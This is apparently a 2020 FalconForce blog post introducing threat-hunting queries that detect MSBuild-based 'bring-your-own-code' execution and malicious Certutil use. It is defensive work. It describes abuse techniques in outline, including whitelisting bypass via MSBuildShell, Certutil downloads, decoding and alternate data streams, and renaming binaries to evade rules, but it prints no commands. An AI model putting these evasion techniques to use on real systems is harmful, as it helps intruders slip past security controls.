FalconFriday — Detecting suspicious code compilation and Certutil — 0xFF02

Olaf Hartong
Sep 11, 2020 · 4 min read

We believe there isn’t enough content available to detect advanced adversary techniques. That’s why every two weeks on “FalconFriday”, we will release hunting queries to detect offensive techniques. Today: part three!

Today’s content:

  • Detecting the malicious use of Certutil.

We love to hear back from you on the results. Any feedback or suggestions for improvements are welcome. Feel free to create pull requests if you have improvements which can benefit the community.

‘Bring-your-own-code’

This query is aimed at detecting process executions, specifically those associated with compilation software.

Several tools exist for this purpose. An example of this is a tool created by Cn33liz called MSBuildShell. This tool provides a PowerShell-like shell from MSBuild.exe, allowing you to do everything as if it was a normal PowerShell session; yet bypassing controls like application whitelisting and process restrictions.

Using these techniques to remain undetected is not new, in fact it has been around for a very long time. Still it remains a very effective technique, largely because this behaviour is not detected by default use cases in a lot of security solutions. Luckily for you, this FalconFriday brings you some ideas how you can catch this behaviour!

A few considerations:

  • To reduce false positives, we recommend excluding items based on specific FolderPaths.
  • Depending on your environment, there obviously may be some legitimate use that we didn’t account for.

You can find the query here on GitHub, we tagged it as T1127-WIN-001.md.

Like to read more about this ?

Certificate services: Certutil

  • LOLbins: using Windows binaries.
  • LOLLibs: using libraries
  • LOLScripts: using scripts

There’s also a repo available called ‘Living Off The Land Binaries and Scripts’ (LOLBAS), centralising over 100 binaries to use. This repo is maintained by several individuals. The most popular LOLbin according to stats by Oddvar Moe, and one of the more versatile ones, is Certutil.

This query is aimed at detecting malicious use of Certutil.

According to Microsoft ‘Certutil.exe is a command-line program, installed as part of Certificate Services. You can use certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains’.

This LOLBin can be used to execute the following techniques:

  • T1105 — Ingress Tool Transfer
  • T1564.004 — Hide Artifacts: NTFS File Attributes
  • T1027 — Obfuscated Files or Information
  • T1140 — Deobfuscate/Decode Files or Information

Now how can we detect malicious behaviour— given most of time it consists of legitimate activity:

  • Our detection addresses focuses on detection ‘detection evasion’ techniques. Most of these have been pulled from the amazing research by Daniel Bohannon, aptly named DOSfuscation.
  • Second, you want to define the HashTimeFrame. We recommend to work with a 30d timeframe due to potential resource constraints.
  • Next we want to start looking into Certutil executions by investigating SHA1 hashes from prior Certutil executions or file create events where the former file name is Certutil.

A few considerations:

  • Take into account that there are always bypasses possible. For example, we added detection resiliency logic in an attempt to address the potential scenario where the attacker renames the binary first before executing it. If he were to upload the renamed binary it might be missed by our rule.
  • For the download technique, you could match it to DeviceNetworkEvents that connect to the internet for more contextual information.

Usage in production

You can find the query here on GitHub, we tagged it as T1105-WIN-001.md.

Like to read more about this ?

Disclaimers

  • The queries will be free to use in any way you like, although we appreciate a reference back to @falconforceteam Twitter / FalconForce GitHub.
  • Direct link to our Github page: https://github.com/FalconForceTeam/FalconFriday

The FalconForce Medium page with the bi-weekly articles can be found HERE.

FalconForce

A team of highly specialized security professionals